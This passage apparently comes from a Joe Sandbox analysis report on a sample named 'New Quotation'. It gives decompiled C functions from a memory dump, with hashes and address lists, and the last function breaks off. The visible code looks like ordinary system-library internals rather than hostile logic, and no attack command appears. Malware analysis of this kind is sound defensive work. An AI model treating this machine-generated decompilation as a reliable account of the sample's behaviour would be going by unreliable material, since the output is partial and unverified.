                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 672afbb917fe1811ae7aa3899e5f048dc855659a58cc3e13b7bcf7f9fc6d5870
                                                                                                                                                                                          • Instruction ID: d7b4404b0e9f044efcbfb2f37400726b85989f0c48f2adac1e4cee4040f00069
                                                                                                                                                                                          • Opcode Fuzzy Hash: 672afbb917fe1811ae7aa3899e5f048dc855659a58cc3e13b7bcf7f9fc6d5870
                                                                                                                                                                                          • Instruction Fuzzy Hash: D111C836641644BBE7228F49ED44F7B3B79EB85BA0F120068BA055B2A0DA71ED10D6B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D89D946 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E1D89D946(signed int* __ecx, signed int __edx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t7;
				char* _t10;
				signed int _t18;
				signed int* _t33;
				unsigned int _t38;

				_push(__ecx);
				_t33 = __ecx;
				_t18 = __edx;
				_t38 =  !( *__ecx) + 1;
				if(_a8 != 0) {
					_push((_t38 >> 0x14) + (_t38 >> 0x14));
					L1D89DFBD(__edx, 0x1d8c6dc8, (__edx -  *0x1d8c6dc4 >> 0x14) + (__edx -  *0x1d8c6dc4 >> 0x14), __ecx, _t38, (__edx -  *0x1d8c6dc4 >> 0x14) + (__edx -  *0x1d8c6dc4 >> 0x14));
				}
				_t7 = _a4;
				if(( *(_t33 + 9) & 0x00000007) >= 1 && _t7 == 0x7fffffff) {
					_t7 = E1D89D90D(_t33, _t18);
				}
				E1D89C591(_t33, _t18, _t7);
				if(E1D7E3C40() == 0) {
					_t10 = 0x7ffe0388;
				} else {
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t10 != 0) {
					_t10 = E1D88DA30(_t18, _t33, _t18, _t38);
				}
				return _t10;
			}












                                                                                                                                                                                          0x1d89d94e
                                                                                                                                                                                          0x1d89d952
                                                                                                                                                                                          0x1d89d954
                                                                                                                                                                                          0x1d89d95a
                                                                                                                                                                                          0x1d89d95f
                                                                                                                                                                                          0x1d89d978
                                                                                                                                                                                          0x1d89d979
                                                                                                                                                                                          0x1d89d979
                                                                                                                                                                                          0x1d89d985
                                                                                                                                                                                          0x1d89d988
                                                                                                                                                                                          0x1d89d995
                                                                                                                                                                                          0x1d89d995
                                                                                                                                                                                          0x1d89d99f
                                                                                                                                                                                          0x1d89d9ab
                                                                                                                                                                                          0x1d89d9bd
                                                                                                                                                                                          0x1d89d9ad
                                                                                                                                                                                          0x1d89d9b6
                                                                                                                                                                                          0x1d89d9b6
                                                                                                                                                                                          0x1d89d9c5
                                                                                                                                                                                          0x1d89d9cc
                                                                                                                                                                                          0x1d89d9cc
                                                                                                                                                                                          0x1d89d9d7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8da5f17ce2dd6de86e5b63e7e0578e664161117e18ac1e34a9cac75a2772fa51
                                                                                                                                                                                          • Instruction ID: 166191ce71513800b3c37caa4af780fda131f8bcd6271f3c19ea916eba31fe8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da5f17ce2dd6de86e5b63e7e0578e664161117e18ac1e34a9cac75a2772fa51
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501D6267040049BC7099A2D9841B7EB3CAABC4220F154165F5D9C7795DE24EC42C2A7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C7CF1 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E1D7C7CF1(void* __ecx, intOrPtr* __edx) {
				void* _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					L1D7E2330(_t6, 0x1d8c6718);
				}
				_t29 = E1D7C7D7A(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E1D7E24D0(0x1d8c6718);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}









                                                                                                                                                                                          0x1d7c7cf6
                                                                                                                                                                                          0x1d7c7cf8
                                                                                                                                                                                          0x1d7c7d01
                                                                                                                                                                                          0x1d7c7d04
                                                                                                                                                                                          0x1d7c7d04
                                                                                                                                                                                          0x1d7c7d10
                                                                                                                                                                                          0x1d7c7d14
                                                                                                                                                                                          0x1d7c7d42
                                                                                                                                                                                          0x1d7c7d44
                                                                                                                                                                                          0x1d7c7d47
                                                                                                                                                                                          0x1d7c7d47
                                                                                                                                                                                          0x1d7c7d4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d50
                                                                                                                                                                                          0x1d7c7d52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d5f
                                                                                                                                                                                          0x1d7c7d16
                                                                                                                                                                                          0x1d7c7d16
                                                                                                                                                                                          0x1d7c7d1b
                                                                                                                                                                                          0x1d7c7d6a
                                                                                                                                                                                          0x1d7c7d6a
                                                                                                                                                                                          0x1d7c7d6d
                                                                                                                                                                                          0x1d7c7d6f
                                                                                                                                                                                          0x1d7c7d6f
                                                                                                                                                                                          0x1d7c7d64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d64
                                                                                                                                                                                          0x1d7c7d1d
                                                                                                                                                                                          0x1d7c7d22
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d24
                                                                                                                                                                                          0x1d7c7d26
                                                                                                                                                                                          0x1d7c7d3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7d3d

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a45ecc55eee81831001d9c7709c21f7e06809fb401281342e273d58f7c4804cf
                                                                                                                                                                                          • Instruction ID: dfbeb29013a8372bcc5aa0c12a89c9122df0d7165ec3d9dd0b357ef90cd022a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a45ecc55eee81831001d9c7709c21f7e06809fb401281342e273d58f7c4804cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8010472645A529FC7278A14D840A36BBA6EFC6B71F06C4ABE5498F310EF30D805C682
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FAF72 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E1D7FAF72(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _t12;
				void* _t14;
				void* _t22;
				signed int _t28;
				intOrPtr _t31;
				void* _t33;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t12 =  *((intOrPtr*)(_t31 + 0x48));
				_v8 = _t12;
				if(_t12 == 0) {
					_push("true");
					_pop(_t28);
					_t14 = E1D7FAD20(0,  &_v12, _t28);
					if(_t14 >= 0) {
						_t22 = _v12;
						goto L3;
					}
				} else {
					_t28 = E1D7FBA17(_t12, 1);
					_t23 = _t28;
					_t22 = E1D7FB9FA(_t28);
					if(_t22 == 0) {
						_t14 = 0xc000009a;
					} else {
						E1D8188C0(_t22, _v8, _t28);
						_t33 = _t33 + 0xc;
						L3:
						 *((intOrPtr*)(_t31 + 0x294)) =  *((intOrPtr*)(_t31 + 0x294)) + 1;
						 *((intOrPtr*)(_t31 + 0x48)) = _t22;
						 *((intOrPtr*)(_t31 + 0x290)) = _t28;
						E1D818F40(0x1d8c63a0, 0, 0x234);
						E1D7FAFF1(_t23);
						_t14 = 0;
					}
				}
				return _t14;
			}











                                                                                                                                                                                          0x1d7faf72
                                                                                                                                                                                          0x1d7faf77
                                                                                                                                                                                          0x1d7faf78
                                                                                                                                                                                          0x1d7faf82
                                                                                                                                                                                          0x1d7faf85
                                                                                                                                                                                          0x1d7faf88
                                                                                                                                                                                          0x1d7faf8d
                                                                                                                                                                                          0x1d83e25f
                                                                                                                                                                                          0x1d83e261
                                                                                                                                                                                          0x1d83e269
                                                                                                                                                                                          0x1d83e270
                                                                                                                                                                                          0x1d83e276
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e276
                                                                                                                                                                                          0x1d7faf93
                                                                                                                                                                                          0x1d7faf9d
                                                                                                                                                                                          0x1d7faf9f
                                                                                                                                                                                          0x1d7fafa6
                                                                                                                                                                                          0x1d7fafaa
                                                                                                                                                                                          0x1d7fafe8
                                                                                                                                                                                          0x1d7fafac
                                                                                                                                                                                          0x1d7fafb1
                                                                                                                                                                                          0x1d7fafb6
                                                                                                                                                                                          0x1d7fafb9
                                                                                                                                                                                          0x1d7fafb9
                                                                                                                                                                                          0x1d7fafcb
                                                                                                                                                                                          0x1d7fafce
                                                                                                                                                                                          0x1d7fafd4
                                                                                                                                                                                          0x1d7fafdc
                                                                                                                                                                                          0x1d7fafe1
                                                                                                                                                                                          0x1d7fafe1
                                                                                                                                                                                          0x1d7fafaa
                                                                                                                                                                                          0x1d7fafe7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c5f105ac1a0946f9d27efbb9af0620f729131027eb6514bd8e12eb7fb1f31f1d
                                                                                                                                                                                          • Instruction ID: 94b3ed55735553f2c0a8d21542d2d995572f494f2bbc4d725f9454e969804dc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5f105ac1a0946f9d27efbb9af0620f729131027eb6514bd8e12eb7fb1f31f1d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C01D6B6704300ABD720A7AA9C85F6BB7F8DBC4624F010029E7159B351E674FD018652
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FE94E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 23%
                                                                                                                                                                                          			E1D7FE94E(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v20;
				intOrPtr* _t9;
				intOrPtr* _t11;
				intOrPtr* _t17;
				void* _t18;
				void* _t26;

				_push(__ecx);
				_t26 = __ecx;
				_t9 =  *((intOrPtr*)(__ecx + 0x18));
				if( *_t9 < 0) {
					L5:
					return _t9;
				} else {
					E1D7DFED0(0x1d8c5ce0);
					_t17 =  *0x1d8c5d04; // 0x773f5d00
					_t11 = _t26 + 0x24;
					if( *_t17 != 0x1d8c5d00) {
						_t18 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t18);
						return E1D7FEB1C( *((intOrPtr*)(_v8 + 0xc)), _v8,  &_v20);
					} else {
						 *_t11 = 0x1d8c5d00;
						 *((intOrPtr*)(_t11 + 4)) = _t17;
						 *_t17 = _t11;
						_push(0x1d8c5ce0);
						 *0x1d8c5d04 = _t11;
						_t9 = E1D7DE740(_t17);
						if( *0x1d8c5cac != 0) {
							_t9 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
							if( *((char*)(_t9 + 0x28)) == 0) {
								_t9 = E1D7E1B80( *0x1d8c5cac);
							}
						}
						goto L5;
					}
				}
			}










                                                                                                                                                                                          0x1d7fe950
                                                                                                                                                                                          0x1d7fe952
                                                                                                                                                                                          0x1d7fe955
                                                                                                                                                                                          0x1d7fe95b
                                                                                                                                                                                          0x1d7fe9af
                                                                                                                                                                                          0x1d7fe9b2
                                                                                                                                                                                          0x1d7fe95d
                                                                                                                                                                                          0x1d7fe963
                                                                                                                                                                                          0x1d7fe968
                                                                                                                                                                                          0x1d7fe96e
                                                                                                                                                                                          0x1d7fe978
                                                                                                                                                                                          0x1d7fe9b5
                                                                                                                                                                                          0x1d7fe9b6
                                                                                                                                                                                          0x1d7fe9b8
                                                                                                                                                                                          0x1d7fe9b9
                                                                                                                                                                                          0x1d7fe9ba
                                                                                                                                                                                          0x1d7fe9bb
                                                                                                                                                                                          0x1d7fe9bc
                                                                                                                                                                                          0x1d7fe9bd
                                                                                                                                                                                          0x1d7fe9be
                                                                                                                                                                                          0x1d7fe9bf
                                                                                                                                                                                          0x1d7fe9c5
                                                                                                                                                                                          0x1d7fe9d6
                                                                                                                                                                                          0x1d7fe97a
                                                                                                                                                                                          0x1d7fe97a
                                                                                                                                                                                          0x1d7fe97c
                                                                                                                                                                                          0x1d7fe97f
                                                                                                                                                                                          0x1d7fe981
                                                                                                                                                                                          0x1d7fe982
                                                                                                                                                                                          0x1d7fe987
                                                                                                                                                                                          0x1d7fe993
                                                                                                                                                                                          0x1d7fe99b
                                                                                                                                                                                          0x1d7fe9a2
                                                                                                                                                                                          0x1d7fe9aa
                                                                                                                                                                                          0x1d7fe9aa
                                                                                                                                                                                          0x1d7fe9a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fe993
                                                                                                                                                                                          0x1d7fe978

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 00a529bd2b3edd5ec5016b76676fd8a2aa990171781ea5d0279143f01d5e1c1b
                                                                                                                                                                                          • Instruction ID: c39970d0c205fc733f90b087e93b3f8fc409cbc7a337cee374d01f97a2f735ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a529bd2b3edd5ec5016b76676fd8a2aa990171781ea5d0279143f01d5e1c1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01CC71504244EFC715CB14E448F9AB7FAEBC5B74F2585BAE2058B760D7B0E841CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D866E30 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                          			E1D866E30(signed int _a4) {
				signed char _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E1D812DC0();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push("true");
					_t27 = _t26 + 4;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E1D812A60();
					if( *_t27 != 0) {
						_push( *_t27);
						E1D812A80();
					}
				}
				if( *((intOrPtr*)(_t26 + 8)) != _t26 + 0x14) {
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E1D812A80();
				return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                                                                                          0x1d866e38
                                                                                                                                                                                          0x1d866e3d
                                                                                                                                                                                          0x1d866e46
                                                                                                                                                                                          0x1d866e48
                                                                                                                                                                                          0x1d866e49
                                                                                                                                                                                          0x1d866e4a
                                                                                                                                                                                          0x1d866e4b
                                                                                                                                                                                          0x1d866e4e
                                                                                                                                                                                          0x1d866e4f
                                                                                                                                                                                          0x1d866e51
                                                                                                                                                                                          0x1d866e56
                                                                                                                                                                                          0x1d866e56
                                                                                                                                                                                          0x1d866e5c
                                                                                                                                                                                          0x1d866e5e
                                                                                                                                                                                          0x1d866e60
                                                                                                                                                                                          0x1d866e63
                                                                                                                                                                                          0x1d866e64
                                                                                                                                                                                          0x1d866e66
                                                                                                                                                                                          0x1d866e68
                                                                                                                                                                                          0x1d866e6f
                                                                                                                                                                                          0x1d866e71
                                                                                                                                                                                          0x1d866e73
                                                                                                                                                                                          0x1d866e73
                                                                                                                                                                                          0x1d866e6f
                                                                                                                                                                                          0x1d866e7e
                                                                                                                                                                                          0x1d866e8d
                                                                                                                                                                                          0x1d866e8d
                                                                                                                                                                                          0x1d866e92
                                                                                                                                                                                          0x1d866e94
                                                                                                                                                                                          0x1d866ead

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
                                                                                                                                                                                          • Instruction ID: 2cc90c2f36447fba0d5b8f3da6d078309d82450ca6c1f94d219ee0ac3938132d
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5101CCB6180649BFD7218F65CC81EA3BB7DFF503A5B120128F20547570C722FCA4CAA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C99F0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E1D7C99F0(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t10;
				intOrPtr _t15;
				intOrPtr* _t24;
				void* _t26;
				signed int _t27;

				L1D7E2330(_t10, 0x1d8c6814);
				_t27 = E1D7C9A6E(_a4);
				if(_t27 == 0) {
					_t26 = 0xc000002a;
				} else {
					_t2 = _t27 + 0x10;
					 *_t2 =  *((intOrPtr*)(_t27 + 0x10)) - 1;
					if( *_t2 != 0) {
						L8:
						_t26 = 0;
					} else {
						_t15 =  *_t27;
						if( *((intOrPtr*)(_t15 + 4)) != _t27) {
							L7:
							_push(3);
							asm("int 0x29");
							goto L8;
						} else {
							_t24 =  *((intOrPtr*)(_t27 + 4));
							if( *_t24 != _t27) {
								goto L7;
							} else {
								 *_t24 = _t15;
								 *((intOrPtr*)(_t15 + 4)) = _t24;
								_t7 = _t27 + 0xc; // 0xc
								_push(1);
								_t8 = _t27 + 8; // 0x8
								_push(0xffffffff);
								_t26 = E1D814660();
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t27);
							}
						}
					}
				}
				E1D7E24D0(0x1d8c6814);
				return _t26;
			}








                                                                                                                                                                                          0x1d7c99fe
                                                                                                                                                                                          0x1d7c9a0b
                                                                                                                                                                                          0x1d7c9a0f
                                                                                                                                                                                          0x1d7c9a5e
                                                                                                                                                                                          0x1d7c9a11
                                                                                                                                                                                          0x1d7c9a11
                                                                                                                                                                                          0x1d7c9a11
                                                                                                                                                                                          0x1d7c9a15
                                                                                                                                                                                          0x1d7c9a6a
                                                                                                                                                                                          0x1d7c9a6a
                                                                                                                                                                                          0x1d7c9a17
                                                                                                                                                                                          0x1d7c9a17
                                                                                                                                                                                          0x1d7c9a1c
                                                                                                                                                                                          0x1d7c9a65
                                                                                                                                                                                          0x1d7c9a65
                                                                                                                                                                                          0x1d7c9a68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c9a1e
                                                                                                                                                                                          0x1d7c9a1e
                                                                                                                                                                                          0x1d7c9a23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c9a25
                                                                                                                                                                                          0x1d7c9a25
                                                                                                                                                                                          0x1d7c9a27
                                                                                                                                                                                          0x1d7c9a2a
                                                                                                                                                                                          0x1d7c9a2d
                                                                                                                                                                                          0x1d7c9a30
                                                                                                                                                                                          0x1d7c9a34
                                                                                                                                                                                          0x1d7c9a42
                                                                                                                                                                                          0x1d7c9a4a
                                                                                                                                                                                          0x1d7c9a4a
                                                                                                                                                                                          0x1d7c9a23
                                                                                                                                                                                          0x1d7c9a1c
                                                                                                                                                                                          0x1d7c9a15
                                                                                                                                                                                          0x1d7c9a50
                                                                                                                                                                                          0x1d7c9a5b

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1c8094665cfe62488d2277371494aa37f05db29a90648998348fd76195ce72a6
                                                                                                                                                                                          • Instruction ID: c8482edf4c8d8aba14679c0d69dfe3b3f14a42f4da52e4f817f9f8ce43218d14
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8094665cfe62488d2277371494aa37f05db29a90648998348fd76195ce72a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601FC73145601AFD3628F15DC44E5B77ADEF81B75F11913AE21A4B150CB71ED01C792
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D806CC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D806CC0(void* __ecx, void* __eflags, signed short* _a4, char* _a8) {
				short _v12;
				void* _t16;
				short _t20;
				char* _t28;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				E1D7EDF36(0, _a4, 0x14d0);
				_t28 = _a8;
				_t32 = E1D7F015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _a4, 0, _t28,  &_v12);
				if(_t32 < 0 ||  *_t28 == 0) {
					_t20 = 0x14d3;
				} else {
					_t20 = (0 | _v12 == 0x00000000) + 0x14d1;
				}
				E1D7EDF36(0, _a4, _t20);
				if(_t32 < 0) {
					_t16 = _t32;
				} else {
					if(_v12 == 0) {
						if( *_t28 != 0) {
							 *_t28 = 0;
						}
					}
					_t16 = 0;
				}
				return _t16;
			}








                                                                                                                                                                                          0x1d806cc5
                                                                                                                                                                                          0x1d806cc6
                                                                                                                                                                                          0x1d806cdc
                                                                                                                                                                                          0x1d806ce1
                                                                                                                                                                                          0x1d806cf5
                                                                                                                                                                                          0x1d806cf9
                                                                                                                                                                                          0x1d806d37
                                                                                                                                                                                          0x1d806d00
                                                                                                                                                                                          0x1d806d09
                                                                                                                                                                                          0x1d806d09
                                                                                                                                                                                          0x1d806d15
                                                                                                                                                                                          0x1d806d1c
                                                                                                                                                                                          0x1d806d3e
                                                                                                                                                                                          0x1d806d1e
                                                                                                                                                                                          0x1d806d23
                                                                                                                                                                                          0x1d806d30
                                                                                                                                                                                          0x1d806d32
                                                                                                                                                                                          0x1d806d32
                                                                                                                                                                                          0x1d806d30
                                                                                                                                                                                          0x1d806d25
                                                                                                                                                                                          0x1d806d25
                                                                                                                                                                                          0x1d806d2a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                                                                                                          • Instruction ID: cc1e945369f4b6c1c08ae8895a4ee33448a2fd781ddb24875697737e1842751b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C014CB260416A7BEB258B15DC42BAF7F64EF40B64F218019BD065B2D0D674D880C3E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84DE50 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E1D84DE50(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _t17;
				intOrPtr _t23;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t34;

				_push(__ecx);
				_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t34 = _a4;
				_t17 = E1D7FB870(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t34);
				E1D7DFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
